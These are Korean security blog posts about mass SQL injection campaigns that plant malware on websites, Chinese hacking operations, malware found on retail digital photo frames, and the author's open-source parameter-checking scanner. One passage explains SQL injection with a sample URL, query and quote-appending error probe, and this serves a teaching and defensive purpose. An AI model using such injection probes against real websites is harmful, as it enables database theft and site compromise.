거의 열에 아홉은 공격 대상자에 포함이 됩니다. 이중 패치를 설치한 사용자 비율을 30% 이상으로 산정하고 10% 가량을 해당 사항이 없는 운영체제로 보면 5000만대의 PC 60%에 달하는 개인PC들에 영향을 미침을 알 수 있습니다. 무려 3000만대 입니다.

 

보수적인 계산을 하였다는 가정입니다. 50만개의 웹사이트에 하루에 열명 정도의 방문자만 있고 노출 기간이 열흘이라고 산정 한 정말 최소의 결과라 할 수 있습니다.

 

l        일례로 Autoweb 이라는 회사도 공격의 대상이 되었습니다만 일일 방문자가 25000명 이라고 합니다. 10*10을 한 100명이 아니구요. 공격 대상이 얼마나 되었을지는 상상에 맡깁니다.

Ref: http://www.networkworld.com/news/2008/050108-autoweb.html 

 

위의 통계치에서 산출된 PC의 수치는 말 그대로 계산의 편리성을 위해 비약 없이 산정한 것이며 실제로는 이보다 더한 경우라고 판단 됩니다. 노출 기간은 앞으로도 상당기간 계속 될 수 밖에 없어서 문제는 더해질 수 밖에 없는 부분이죠.

 

 

 

 

왜 상상하기가 어려울만큼의 위협인가?

 

 

근본적인 문제를 지적 합니다.

 

50만대의 웹서비스에 악성코드를 설치하는 코드를 넣기 위해서는 전제 조건이 필요합니다.

해외의 기사 및 국내의 기사들도 이런 부분을 간과하고 있습니다. 심지어 전문가들 조차도...

 

 

l       문제의 시작은 필터링이 되지 않은 Web service의 코딩 문제

 

l       Database의 완전한 권한 획득 (이미 DB에 저장된 정보는 공격자의 것입니다.)

 

l       DB 권한을 통한 웹서비스 소스의 자유자재 변경 권한 (50만대의 웹서비스를 동시에 하나의 웹페이지로 변경하는 것도 가능하겠죠? 그러나 공격자들은 하지 않습니다.) 소스의 변경권한이 있어야 웹소스 내용에 악성코드를 유포하는 스크립트를 추가 하는 것이 가능합니다. 더불어 DB에 쓰기가 가능한 것도 마찬가지 이겠죠. 이건 시스템에 대한 완벽한 제어 기능과도 동일합니다.

   

 

위와 같은 세 개의 전제가 깔려 있습니다. 현상만을 논하기엔 문제가 많습니다. 50만대의 웹서비스 혹은 50만대의 개별 Database ( PC가 아닙니다. )에 저장된 정보의 유출, 또 최소한의 방문자에게도 유포되는 악성코드들의 파장 ( 위의 계산대로 최소화 하여 3000만대 이상의 수치입니다. ) 은 어디까지 미칠 수 있을까요?

 

현재의 공격코드는 지난 해에 패치가 나온 취약성을 공격하는 유형이지만 새로운 유형으로 변경이 된다면? 또 백신이나 보안소프트웨어에서 탐지가 어려운 Zeroday 유형이라면 어떤 결과가 초래 될까요?

 

키보드로부터 입력 되는 것들에 대한 로깅뿐 아니라 백도어 설치를 통한 원격제어 기능들까지도 이미 시현이 된 공격기술입니다. 폭넓은 Agent의 배포수단으로 웹서비스를 택한 것이고 이제는 무차별적인 웹서비스 공격이 시작도 아니고 발견된 것 뿐입니다.

 

Websense F-secure와 같은 보안 전문 회사들에서의 인식도 심각한 수준입니다.

너무 많은 iframe 삽입 루틴이 발견 되고 MS 계열의 웹 서비스 ( IIS + ASP + MSSQL)에서 발견이 되고 있으니 새로운 유형의 웜이나 공격코드가 미 발견된 MS의 취약성을 공격하는 것으로 오인을 하고 있습니다. 안타까운 인식입니다. 이런 유형의 오해는 공격에 대한 이해와 관찰부족으로 인합니다. 또한 종합적인 상황인식의 부족에서 기인합니다 

문제의 원인은 Web application 개발 시에 사용되는 모든 언어들 (php, asp, jsp, html, pl 등등 모든 종류)에서 Database로 전달되는 쿼리에 대해 유효한 쿼리 구문인지에 대한 필터링이 되지 않아서 발생하는 문제입니다. 이런 공격 근거를 몰라서 발생된 오해입니다. 

 

새로운 유형의 웜이나 공격코드가 발견이 된다면 이것은 MS의 취약성을 ( ref: http://www.news.com/8301-10789_3-9930452-57.html?tag=nefd.pop ) 공격하는 것이 아니라 URL의 인자를 DB로 전달하는 부분에서 SQL query에 대한 필터링을 하지 않아서 발생하는 문제입니다. 웜이라 하여도 이건 지능화된 Application 공격 유형의 웜 입니다.

 

 

SQL Injection의 설명

 

Web application을 개발하는 모든 개발언어들은 Database와 연결을 가집니다. 사용자의 선택에 따라서 DB에 저장된 다양한 컨텐츠를 웹페이지에 보여주는 형식을 지닙니다. 어떤 테이블에 몇 번째에 해당하는 데이터를 가져 오겠다고 정의하는 것이 Web app에서 사용하는 SQL 쿼리라고 할 수 있으며 쿼리의 조건은 사용자의 선택에 따라 선별 되게 됩니다. 간단하게  www.vuln.com/list.php?id=1&field=1100 과 같은 URL이 전달된다면 Web service 상에서는 Database에 다음과 같은 유형의 쿼리를 전달 합니다. Select * from Bulletin where tableid=1 and fieldid=1100 와 유사한 쿼리가 발생하게 되죠.

공격의 핵심은 이것에서 기인합니다. 만약 URL 인자에 SQL query를 덧붙이게 되면 어떻게 될까? 여기에서부터 기인을 하며 www.vuln.com/list.php?id=1&field=1100   과 같이 인자의 뒤에 문자 (인용부호)  붙이게 되면 SQL query는 구성상에 에러를 발생 시킵니다.

Select * from Bulletin where tableid=1’’ and fieldid=1100’’  와 같은 구성이 되며 이 경우에 Unclosed quotation mark error와 같은 DB의 에러 구문을 보내게 되죠.  Web 상에는 다양한 SQL Injection 관련된 설명들이 있습니다.  이런 유형들을 간단한 검색으로도 찾을 수가 있습니다.

Sql injection에 대한 간단한 설명: http://blog.naver.com/p4ssion/40017941957

대책에 대한 설명: http://blog.naver.com/p4ssion/40015866029

2005년에 이미 대책과 공격에 대한 위험에 대해서 알린 바가 있습니다.

 

 

위의 SQL injection에 대한 설명은 간단한 공격기법에 대한 설명입니다. 중요한 점은 수십~ 수백 번의 SQL 쿼리 어쩌면 그 이상의 공격 횟수가 필요합니다만 중국의 공격자들은 이와 같은 공격들을 자동화된 도구로 만들었다는 점입니다. 이미 3년도 전에 만들어진 상태입니다.

 

지금의 공격유형은 여기에 몇 가지 기능이 더 부가된 것으로 판단됩니다. 끔찍한 결과를 가져오는 내용이며 앞으로도 계속 유효할 내용입니다.

( 전 세계의 Web application을 각 인자 별로 Filtering을 완전하게 하거나 모든 DB와의 연결을 끊는 것이죠. 사실상 불가능합니다. )

 

문제에 대한 상세한 설명 및 부가적인 대책자료는 중복 내용이므로 자료를 참고 하시기 바랍니다.

http://blog.naver.com/p4ssion/40015866029 개별 시스템에 해당하는 대책이며 전체적이고 광역적인 대책은 별도 언급 하겠습니다.

 

 

 

- 다음편으로 계속 됩니다.

Posted by 바다란

XSS : Cross site scripting - 현재 악성코드 설치 유형이 각 웹서버의 게시물에 대해 Cross site scripting을 이용하여 악성코드를 방문자에게 설치하는 유형이 매우 증가하고 있고 사용자의 쿠키를 외부로 빼내어가 인증 용도로 사용할 수 있는 문제점들이 있으므로 심화 진단하여 제거하는 것이 필요한 취약성

 

SQL Injection: 일반적인 SQL Injection이 아닌 URL 인자 단위마다 임의의 SQL command를 입력하여 데이터를 빼내어 가거나 DB 권한을 획득하여 정보를 유출 시킴.. 또한 획득한 DB 권한을 이용하여 웹서버의 소스코드를 직접 변경함.

 

Type Error:  문자를 입력하지 않아야 될 곳에 문자가 입력되는 등의 Vb script error의 경우에도 올해 상반기에 발견된 공격 유형 중 수치를 이용하여 결과를 유출 시키는 유형이 발견됨에 따라  [ 정수를 Ascii code 값으로 치환하여 결과를 리턴하는 유형 ] 강화된 진단 유형이며 일반적인 Input validation check의 개념에 따라 기본 오류를 찾아내도록 구성된 부분

 

전체적으로 Secure web programming 강화가 필요하며 강화를 위해 간단하게 작성된 스크립트 도구에서는 위의 세가지 문제를 URL 단위의 각 인자마다 체크하는 유형으로 간략하게 구성하여 문제를 확인토록 함.

 

국내의 현황

 

악성코드가 유포되는 모든 사이트들은 DB의 권한 탈취를 통해 웹서버의 소스코드를 변경하는 유형이므로 DB에 저장된 회원 정보 및 기밀 데이터들은 안정성을 보장 할 수 없는 상태임. 따라서 회원 DB 다수의 유출은 이미 돌이킬 수 없는 상태에 접어든 것으로 보임. 현재 상태에서 추가적인 악성코드 유포가 되지 않도록 Validation check를 강화하였을 경우 기존에 유출된 회원정보를 이용한 각 서비스 Unit에 대한 어뷰징이 증가 될 것으로 예상됨.

 

 

 

위의 현황과 문제인식에 따라 몇달전 내부적으로 사용하던 Perl script를 공개 하였습니다.

또한 시간이 허락하는한.. 공개적으로 발전을 시키고자 합니다. 따라서 Sourceforge에 며칠전 등록을 하였습니다. 관심이 있는 분들께서는 함께 참여하여 앞으로 보다 나은 환경 구축에 힘 썼으면 하는 개인적인 바램 있습니다.

 

https://sourceforge.net/projects/gamja

 

Project 페이지 입니다. 몇달전 공개한 스크립트 그대로 이며 기본적으로는 Web 진단 도구화 할 생각도 있습니다. 비싸고 효율성이 그다지 높지 않은 상용 App를 넘지는 못하더라도 기본 진단은 충실히 할 수 있도록 향후 발전 시킬 수 있었으면 합니다.

 

많은 참여 바랍니다.

 

* 공개용 스크립트는 위의 sourceforge 사이트 외에 본 블로그에서도 관련 내용을 확인 하실 수 있습니다. http://blog.naver.com/p4ssion/50009547486

 

 

    - 바다란  (p4ssion)

 

Posted by 바다란

이미 한참도 전에 발표한 자료입니다. 앞으로의 예상에 대해서 1년도 이전에 예상을 했으나 앞으로도 이런 문제가 지속

될 수 밖에 없다는 점이 가장 큰 문제가 아닐까 싶습니다. 2006년 연말에 작성한 글이지만 첨부 파일을 보시면 지금도 또 앞으로도 유효한 내용들이 있습니다. 대책은 더욱 그러하죠. 참고하시고 보다 안전한 환경이 되었으면 합니다. 올바른 의견의 확산도..

-----------------------------------------------------------------------------------------------

안녕하세요. 바다란입니다.

 

지난해 부터 급격하게 이슈화된 중국발 해킹에 대해 일정 수준 종합이 필요한 것 같습니다.

현재 게시물에 첨부된 문서는 지난 11.30일에 있었던 민.관 전문가 조사단에서 요청하여 발표한 자료입니다.

 

* 기업에 대한 내용 및 문서 중 정보 노출이 있는 부분은 삭제 하였습니다. 그러므로 결론 부분에 집중하시면 될 것 같습니다.

 

중국발 해킹에 대한 기술적인 내용 보다는 기업차원의 대응 수준 및 향후 필요 요구 사항 그리고 정책적인 대응이 필요한 부분들에 대해서 정리를 한 부분입니다.

 

대개 이슈화 되기에는 악성코드의 유포만이 이슈가 되고 있는데 그 동안 악성코드 유포로 지적이 되었고 언론에 발표 되었던 다수의 사이트들을 많이 알고 계실 것입니다. 그러나 악성코드 유포를 통해 게임이나 온라인 서비스를 이용하는 사용자의 정보만을 가로채어가는 것으로 인식이 되고 있는데 가장 중요한 부분을 간과하고 있는 면이 매우 크다고 볼 수 있습니다.

가장 중요한 점은 악성코드를 유포하기 위해서는 서버 단위에서 소스를 수정할 권한이 있어야 되며 수정할 권한을 지니고 있을 경우에는 모든 연결된 Database의 자료를 빼내어 가는 것이 가능하다는 것이죠.

 

지금까지 해킹을 통해 악성코드 유포로 이용이 된 곳들은 단순한 악성코드 유포를 목적으로 한 곳도 있지만 더 이상 가져갈 자료가 없다고 판단되어 최종적으로 악성코드를 유포하는 유포지로 이용한 의미가 크다고 할 수 있습니다.

 

지난해 10월의 중국발 해킹 대응 세미나를 통해 처음 위험요소를 알렸고 여러 차례의 세미나 및 발표를 통해 충분한 위협을 알렸지만 현재도 향후 발생될 위협에 대한 정확한 인지는 없다고 볼 수 있을 것 같아 조금 정리를 해본 자료 입니다. 중복된 내용 많이 있습니다. ^^;

 

뒷부분의 결론 부분에 들어 있는 내용이 향후 발생될 위험 요소 및 새로운 위협에 대해서 정리를 한 의견이며 앞으로는 기 유출된 수십억건 이상의 개인정보 [ 상세화의 차이는 있는 정보]를 도용한 IT 서비스의 혼란이 주된 요소가 될 수 있을 것 같습니다.

 

전체적인 대응 방안도 꾸준하고 지속적인 계정 관리의 이슈 제기 및 강력한 캠페인 등등 여러 요소가 구비되어야만 가능할 것이며 대응은 느리나 꾸준하게 진행이 되어야 할 것이고 피해는 지속 될 것으로 예상 됩니다.

 

간단한 참고자료 .. 향후 각 서비스별 위험요소에 대한 대비를 통해 일정 수준 대비를 하는 것이 필요할 것 같습니다.

 

의견 있으시면 언제든지 의견 주십시요.

Posted by 바다란

오랜만입니다.

 

여러 개인 사정으로 인해 글을 쓸 여유가 없었습니다.

앞으로도 상황은 마찬가지 일 것 같습니다.

 

SQL Injection . 지금에 와서 이 공격의 유형을 모르는 한국이나 전 세계의 웹 개발자 혹은 보안 전문가는 없으리라 봅니다. 3~4년 전만 하여도 일선의 재빠른 사람들에게만 인지 되는 사안들이 이제는 글로벌화된 상황이라 할 수 있습니다.

 

이전에 존재 하였던 SQL Injection 유형과 현재 발생하는 유형의 차이점은 이 블로그의 Mass sql injection 관련 글을 찾아 보시면 좀 더 쉽게 이해가 되시리라 봅니다.

 

현재는 상황 그대로 세계적인 불황입니다. 얼마전 글에서 예측 하였듯이 앞으로 노골적인 공격들이 더욱 거세 질 것 이고 보다 전문화된 공격들도 직접 이용이 될 것입니다. 최근 MS에서 긴급패치가 이루어진 MS08-067의 경우에도 PoC( Proof of concept - 공격 개념코드)가 나오기 이전에 계정정보 유출을 위한 실제 Trojan이 배포 된 이후에 MS 측에서 대응을 한 내용입니다.

 

앞으로 이와 같은 상황은 더욱 거세질 것입니다.  공격의 전문성도 높아지고 유포되는 범주도 지속 되고 있습니다. 지금도 하루에 수 십차례 이상 공격을 받는 곳들이 대다수 일 것이고 문제가 심각한 기업들은 웹보안 장비들의 도입에 열을 올리고 있을 것입니다. 이런 웹 보안장비들의 근본적인 한계에 대해서는 본 블로그에서 여러 차례 지적한 바가 있습니다.

 

 

 

공격의 전문성 강화

 

공격의 전문성이 높아지는 것은 비단 이번의 MS08-067의 예를 들지 않더라도 2년 전 부터 나타난 현상입니다. 하나의 Trojan을 설치하기 위해 수 십가지 이상의 여러 Application에 대한 공격코드들이 최적화 되어 있고 주변으로 전파를 하고 있습니다. 심지어는 ARP spoofing까지도 이루어 지죠. ( SQL Injection 이든 Arp spoofing의 경우에도 기존의 공격 개념과는 다른 관점으로 상당히 발전적인 응용이라 할 수 있습니다. )  공격자들은 그만큼 기존의 공격 기법과 새로운 취약성의 접합과 연구에 적극적입니다.

 

그리고 그들은 이제 전문 영역을 지니게 되었습니다. 이 의미는 하나의 산업으로 존재할 만큼의 기술적인 (?) 공격 역량과 숙련도를 보유하고 있다는 것이라 할 수 있습니다. 이런 기술을 이용하여 이득을 취하기 위한 또 다른 산업 영역도 개척을 한 상태입니다. 즉 소비채널과 유통채널의 구축이 완료된 상태라 할 수 있습니다.  앞으로 더욱 심해 질 것입니다.

 

새로운 Exploit의 최초 발견과 적용이 연구자들 사이에서 나오는 것이 아니라 이제는 공격자들에게서 직접 발생이 되고 있습니다. 이 추세는 향후에도 증가 할 것으로 예상 됩니다. 더불어 SQL Injection의 경우에도 여러 번 거듭 말씀 드렸지만 단순 패턴매칭으로 차단하는 보안장비에서는 해결이 되지 않습니다. 지금도 정말 많은 우회 기법들이 나오고 있고 바로 적용이 되고 있습니다. 공격자는 코드 한번만 바꾸면 되지만 방어자는 수 천, 수 만 아니 그 이상의 장비들에 대해 개별적인 설정이 되어야만 합니다. 

 

이 싸움에서 이길 것이라 보십니까?  저는 진다고 봅니다.

 

 

(Mass sql injection)양식장을 손에 쥔 상어떼

 

이 표현이 적당한 가 모르겠습니다만 제 머리속에 그려지는 이미지로는 이 표현외에는 더 적당한 표현을 할 수가 없습니다. 양식장은 전 세계의 웹 서비스가 해당이 됩니다.

상어떼는 아시다 시피 공격자들이구요. 양식장에 갇힌게 아니라 언제든 잡을 수 있는 그물을 상어떼가 가지고 있는 모양새 입니다.  이 그물을 어떻게 끊을 수 있을까요? 

 

개별 웹 서비스들에 대해서는 가능하겠지만 전 세계적인 범주에서 보면 정말 어려운 일일 것입니다.  전 세계 웹 서비스의 인자 각각에 유효성 체크가 되어야만 하는데 현실적으로 어렵습니다. 스캐너를 이용한 진단의 경우에도 여러 한계가 있음을 지적한 바 있습니다. 앞으로도 오랜 시간이 흘러야 범위가 줄어들 것이고 그 이전까지는 광범위한 Trojan의 유포와 악성코드에 의해 전 세계의 개인 PC가 시달릴 것입니다. 윗 절의 공격의 전문성 강화와 겹쳐져 공격의 전문성과 파급력은 지속이 될 것이고 PC에 설치되는 다양한 Application에 대해 공격이 이루어 질 것입니다.

 

현재의 공격은 서비스에 대한 공격인 DDos 공격과 금전을 목적으로 한 Trojan 유포에 중점이 맞추어져 있습니다. Trojan 유포는 웜과 바이러스를 통한 유포의 범주보다 웹서비스를 통한 광범위한 유포가 일반화 되어 있습니다. 지금의 공격자들의 특성은 자신을 과시하지 않습니다. 오로지 금전적인 정보가 목적일 뿐입니다.

 

전 세계 모든 보안 채널 및 보안 관련 회사들이 새로운 유형의 공격기법이나 취약성이 출현 할때 마다 예전보다 휠씬 더 긴밀하게 협력을 하고 있습니다. 그래도 모자람이 너무 많습니다.

 

 

이런 그물을 끊어야만 하며 끊기 위해서는 개발자를 위한 자가진단이 가능한 저가 웹서비스 혹은 Open source 형태의 서비스가 필요하고 점진적으로 개선을 시킬 수 밖에는 없는 상황입니다.

 

현재 큰 범주에서 문제를 해결 하기 위한 해결책은 한정적입니다. 지역적인 측면이나 기업 측면에서는 비용을 투입하여 해결이 가능하나 웹서비스의 개편시 마다 비용 부담과 끊임없는 지속성을 유지 해야 하는 것이 관건입니다.  Penetration Test ( 모의해킹이라 부르며 시스템에 피해를 입히지 않는 범위에서 공격자의 입장에서 서비스 취약성을 사전 진단하는 유형 )를 할 수 있는 인력들도 한정이 되어 있습니다. 전문기술을 보유하고 있음에도 불구하고 돌쇠타입의 마당쇠로 전방위로 혹사 당하는 것이 지금의 보안 인력 혹은 보안 팀들이라 할 수 있습니다. 언제까지 버틸 수 있을까요? 또 언제까지 혹사를 강요할 수 있을까요? 인력으로 버틸 수 있는 정도는 절대로 아니기에 어려움이 충분히 예상 됩니다. ( 아닌 곳들이 있나요? )

 

 

결론적으로 앞으로 오랜 시간 문제는 지속되고 심화 될 것이고 이 문제를 줄여나가기 위해서는 악성코드 유포의 숙주로 활용되고 있는 웹서비스들의 안정성을 시급하게 보완하고 지속성을 가질 수 있도록 하는 것이 키라고 할 수 있습니다. 이렇게 하여야만 문제를 끝낼 수 있습니다. ( 기술적인 해결책이나 여러 방안들은 http://blog.naver.com/p4ssion 의 여러 Article들을 참조 하시면 됩니다. )   개별 서비스에 대한 해결책의 논의가 아니라 큰 범주에서의 해결 방안은 어떤 성격을 지녀야만 문제 해결에 다가 설 수 있는지를 언급하였습니다.

 

1년 이상을 이런 관점에서 계속적인 의견을 제시하였으나 아직 이런 형태의 서비스나 문제해결 시도는 출현 하지 않았습니다. 그러나 머지 않은 시일 내에 유사한 서비스들이 출현하여 문제점들을 줄여가고 세계적인 방향성을 선도할 것으로 믿어 의심치 않습니다. 누구도 하지 않는다면  저라도..~~

 

 

그럼 .

 

p4ssionable security explorer . 바다란

Posted by 바다란

뭐 하루 이틀 된 이야기도 아닙니다.

이미 5~6년 전 부터 징후가 있었고 그 이후 타임워프 하듯이 대규모로 공격 인력이 늘고 기법도 고도화 되어 왔습니다.

 

이젠 대규모적인 대응 없이는 불가능하다고 볼 수 있습니다.

단편적인 대응과 사법기관 공조 만으로는 빙산의 일각도 제거하기 어렵습니다.

 

체계적이고 근원적인 부분에 대해서 장기적인 처방이 필요한데.. 여유와 인내심을 가지고 정책을 진행하고 방향성을 제시 할 수 있을런지가 가장 중요한 부분입니다. 대책 부분에 대해서는 하두 여러번 언급 했었지만 시행에는 상당 시일이 걸리고 시간이 지난 지금에서도 유효한 대응은 적어 보입니다.

 

앞으로 어떻게 될런지..

http://news.naver.com/main/read.nhn?mode=LSD&mid=sec&sid1=105&oid=029&aid=0001974017

 

종합적인 대책과 향후 진행 해야 될 부분들에 대해서는 2007년에 언급한 대책과 문제 상황 부분이 있습니다. 정말 힘들고 위급한 상황이 닥쳐 올 것이라고 예상을 하고 좀 길게 설명을 했었는데 이제라도 일부분에 대해서 적극적인 시행이 되어야만 할 것입니다. 그렇지 않다면 문제는 더욱 더 심각도를 높여서 일어날 것으로 보입니다.

 

보안적인 문제를 해결 하지 않았을때 발생 되는 피해와 비용은 상상하기 어려울 정도이며 지금도 마찬가지 입니다. 초기에 대규모 노력이 들어가는 것으로 보이지만 이것이 가장 적은 비용을 들이고 문제를 해결 하는 길입니다.

 

다시 한번 문제 해결을 위한 방안들이 다각도로 ( 문제의 근원을 제대로 인식하고 ) 진행이 되었으면 합니다.

 

http://blog.naver.com/p4ssion/50024269739  <- 첨부파일을 참고하세요.

 

2007년에 작성한 글이나 노력이 진행 되지 않는한 향후 3~4년 이상 유효한 글이 될 것입니다.

 

Posted by 바다란

바다란입니다. 오랜만에 뵙습니다.

 

* 디지털 액자에 숨겨진 악성코드가 사진 변경이나 추가를 위해 직접 연결되는 PC에 감염을 시키는 유형의 출현

<imgref: http://www.techgadgets.in/images/bestbuy-frame-infected.jpg >

 

 

악성코드 유포의 새로운 유형이 출현 하였습니다.

디지털 액자를 통한 악성코드의 유포 유형인데 해외 언론에서도 특이함에 주목을 하고 있지만 다른 관점에서 보아야 할 이슈들이 있습니다. 한국내의 현실에서는 그다지 새로울 것이 없는 유형이지만 시사하는 점이 여럿 존재하고 있습니다. 악성코드의 유형은 온라인 게임(특히 MMO- 아마 WoW가 아닐까 예상 됩니다.)의 계정정보를 유출하기 위한 형태이지만 근래에 발견되는 악성코드의 특징대로 사용자의 모든 개인정보에 대한 유출이 가능한 형태라 할 수 있습니다. -* 모든 개인정보에 대한 유출이 가능 하다는 의미는 시스템에 대한 완벽제어가 가능하다는 것과 동일함.

 

 

1. On/Offline 연계를 통한 악성코드의 유포

 

2. 공격 기술의 진보 가속화 (Quality Assurance ??) - Vaccine evasion

 

3. Application Attack의 일반화 및 영향력 확대 - 세계화

 

 

주요 시사점은 위의 세 가지 정도로 볼 수 있습니다.

일반적으로 판매되고 있는 디지털 액자를 통해 Worm 유형의 악성코드 유포를 한 사안인데 심각한 사안은 제조공정에서나 탑재가 가능한 Application에 악성코드가 심어져 있는 것이 발견이 된 것입니다.

 

문제가 된 버젼은 insignia 사에서 제조한 10.4inch의 디지털 액자이며 2007년에만 디지털 액자가 미국 내에서 천만개 가량 팔린 것으로 조사가 되고 있습니다. 이중에 몇 개나 문제가 되고 있는지는 파악하기는 어렵지 않을까 싶습니다.

 

미국 내 대형 유통 업체인 Bestbuy( Sam's club, Costco 등에서도 판매가 되었다고 함)를 통해 Offline 판매가 되었으며 올해의 신년 Holiday 기간 중에 판매된 제품들 중에서 문제가 최초 발견이 된 것으로 보고가 되고 있습니다. 공식적으로 Bestbuy에서는 해당 제품의 판매수치에 대해 언급 하지는 않고 있습니다. 또한 이와 같은 이슈에 대해 제품에 대한 Recall도 없는 상태이구요.

( 그렇다면 Worm을 어떻게 제거 할까요? 디지털 액자에도 AntiVirus를 설치해야 하는 것인지 아니면 PC 연결 이후 해당 디지털 액자에 대해 Storage 검사를 해야 하는 것인지 궁금하네요. 아마도 후자일 것 같습니다.)

 

http://fatmatrix.com/digital-frames-infected-with-virus.html

기사를 확인하여 보면 Insignia와 Bestbuy측은 최초 웜의 발견 이후에 발표된 논평에서 일반적인 바이러스 이며 대부분의 Anti Virus 소프트웨어를 통해 탐지 및 제거가 가능한 유형이라고 해명을 하였으나 이후 전문 AntiVirus 업체인 CA의 분석결과는 또 다른 유형으로 나오고 있습니다.

 

http://www.eurogamer.net/article.php?article_id=92900

온라인 게임 관련 매거진의 내용대로라면 Antivirus 제품에 의한 탐지를 피하고 Windows Firewall ( 이 의미는 외부 연결 제한을 우회 할 수 있다는 의미로서 조금 더 확장하여 보면 독자적인 정보 전달 통로를 제한 없이 이용 할 수 있음을 의미합니다.)의 제한 회피등이 가능하다고 되어 있습니다.

 

좀 더 자세하게 나타난 자료를 찾아 보니 다음과 같습니다. 공신력이 있는 UPI를 통한 언론 보도이니 신뢰가 가능할 것 같습니다.

http://www.upi.com/NewsTrack/Science/2008/02/18/digital_frame_virus_traced_to_china/9409/

위의 기사에서는 좀 더 상세한 내용들이 나오고 있습니다.

 

최소 100여 개 이상의 Antivirus 제품으로 부터 탐지를 회피하고 있으며 Windows system의 보안기능을 우회하는 기능을 가지고 있습니다. 더불어 추적이 힘들도록 구성이 되어 있다고 CA의 제품개발 담당이 이야기를 하고 있습니다. Nuclear  bomb 이라고 언급을 하기도 합니다. 이 의미에는 악성코드의 유포방식, 보안제품에 대한 탐지 우회, 시스템의 제한 우회, 추적 회피 등과 같은 다양한 이슈가 포함 되어 있다고 보입니다.

 

 

언론이나 온라인의 기사만으로 사실 추론은 위와 같이 가능합니다. 그렇다면 이슈가 되는 부분들은 무엇이 있을까요?

 

가장 먼저는 insignia 사의 제품 제조 공정까지 침입한 공격자를 들 수가 있습니다. 제품제조 공정시에 탑재되는 Application을 변조 시킬 정도라면 해당 회사의 전체 시스템도 매우 위험한 상태에 놓여 있으며 이미 공격자가 시스템 대다수의 권한을 가지고 있다고 볼 수 있습니다. 공격이 가능한 지점은 내부 담당자에게 악성코드가 담긴 이메일 전송을 통해 ( 최근엔 Office 계열 파일이 다수 사용됨) 권한 획득을 하였을 경우와 외부로부터 직접 웹 서비스의  Application 취약성을 공격하여 차근차근 권한 획득을 한 두 가지 경우로 볼 수 있습니다.

 

중요한 관점은 사용자들에게 배포되기 직전 단계의 Application 변조가 일어났다는 것이며 그 어떤 AV 제품으로도 탐지가 되지 않는 신형 악성코드가 추가 되었다는 점입니다. 더불어 주변기기를 통한 전파를 노린 점도 향후의 위험성을 증대 시킵니다. 그 어디에도 이런 의미를 논하고 있지는 않습니다.  실제 우리가 사용하고 있는 모든 디지털 관련 제품들이 향후 더욱 큰 위협들에 노출 될 수 밖에 없음을 실증적으로 보여주는 사례라 할 수 있으며 악성코드 전파 방법의 특이성 또한 염두에 둘만 합니다.

 

두 번째로는 악성코드의 진화입니다. 최소 100여 개 이상의 Antivirus 제품으로부터 탐지를 회피한다는 의미는 공격자들이 공유하고 있는 기술 수준이 높음을 의미합니다. 또한 곧 일반화 될 것으로 예상됩니다. 한 해에 몇 천개 혹은 몇 만개 정도씩 만들어 지는 중국발 악성코드의 기능들이 대폭 업그레이드 될 가능성을 내포하고 있다고 볼 수 있습니다. 운영체제의 보호기능 정도는 당연히 더 쉬운 상태라 할 수 있습니다.

 

세 번째로는 Online 상의 방문자가 많은 사이트를 통한 악성코드 유포 이외에도 Offline상의 Digital 주변기기를 통한 전파 방식입니다. 기존에는 방문자가 많은 사이트를 공격하여 소스코드를 변조함으로써 악성코드를 유포하는 방식을 일관되게 사용하였으나 이제는 주변기기 제조회사 등을 공격하여 Offline상에서도 배포가 되는 방향도 시도가 되었다는 점은 여러 가지를 생각하게끔 합니다.

 

 

앞으로의 예상은 중국발 해킹의 세계화와 온라인게임의 risk 지속 확대, 온라인 생활(금융, SNS 등)의 위험 증가가 일반적인 상황이라고 할 수 있습니다.

 

중국발 해킹은 2005년부터 위험요소를 언급 하고 세계적으로 확대 될 것이라고 개인적으로 여러 자리에서 공언 하였습니다. 현재의 상황은 그 공언을 실증적으로 보여주고 있습니다. 앞으로도 상당기간 지속될 것이고 전 세계적인 Risk가 될 것으로 보입니다.  온라인 게임 혹은 금융과 같은 다양한 온라인의 생활은 금전적인 가치와 결부되는 순간에 공격의 대상이 됩니다. 시대의 변화는 온라인에 가치를 부여하는 것이 당연한 것이므로 앞으로의 위험은 모든 부분에 걸쳐 나타날 것으로 예상 됩니다.

 

 

중국발 해킹의 근본적인 부분은 현재 상태에서 두 가지에 기인합니다.  Office 파일을 이용한 신규 백도어 설치 방법 ( 주로 이메일을 활용) , Web Application Attack을 통한  권한획득과 웹 Application 소스코드의 변조를 통한 악성코드 유포입니다.

근본적으로 백도어를 활용한 방식 (주로 폐쇄적인 망을 공격합니다. 주요 국가들의 국가기관들의 공격, 산업기밀의 유출등..) 과 Web Application Attack이 일반적입니다. 아니 이 두 가지가 전부라 할 수 있습니다.

 

백도어를 활용한 방식 부분은 운영체제적인 면과 Antivirus 측면에서 충분한 대응 방안들이 나올 수 있습니다. 그러나 사람이 제작하는 Web Application에 대한 공격은 향후에도 많은 어려움이 있을 수 밖에 없습니다. 아직 중국발 해킹은 2라운드 초반입니다. 이제 겨우 세계로 진출한 것이라 할 수 있습니다.  Web Application의 공격 방식을 유추하여 모든 사이트에서 공격에 사용될 근본 원인을 제거 하지 않는 한 문제는 계속 됩니다.

 

URL에 사용되는 모든 인자들에 대한 Validation check가 문제 해결의 시작이 될 것입니다.

 

국내의 상황을 한번쯤 생각해 보시죠 어떤 위험들이 앞으로 다가 올 것인지... ( IPTV, 유.무선연동 등등 무궁무진 하겠네요..)

 

감사합니다.

 

Posted by 바다란

안녕하세요. 바다란입니다.

 

지난 10.24일에 KISA에서 주최한 침해사고 대응 세미나가 있었습니다.

해당 세미나에서 침해사고의 발전 유형과 대응 방안에 대해서 고민하고자 했는데 제대로 전달이 되었는지 모르겠네요.

 

가장 중요한 팩트는 이미 취약점 및 공격 유형은 커버가 가능한 범위를 넘어 섰다는 점입니다.

기본적으로 지금까지 알고 있던 유형의 대비책만으로는 한계가 있으며 정량적인 대책으로는 해결 되지 않고.. 정성적인 대책이 있어야만..또 꾸준히 진행 되어야만 문제가 일정 수준 이하로 감소 됨을 확인 할 수 있습니다.

 

현재의 공격유형은 매우 치밀하고도 집요합니다.

기존의 모든 보안솔루션을 무력화 시키고도 가볍게 전파가 됩니다.

그만큼 공격 기술의 전파가 빠르게 또 깊이 있게 공유가 된 탓이라 볼 수 있습니다.

 

보안 기술의 전파는 이에 비하면 거북이 걸음이지요.

 

작은 기술이나.. 작은 시각이나마 여러 방면에서 조망을 하여 보다 더 체계적이고 완전한 구성을 만들었으면 합니다.

 

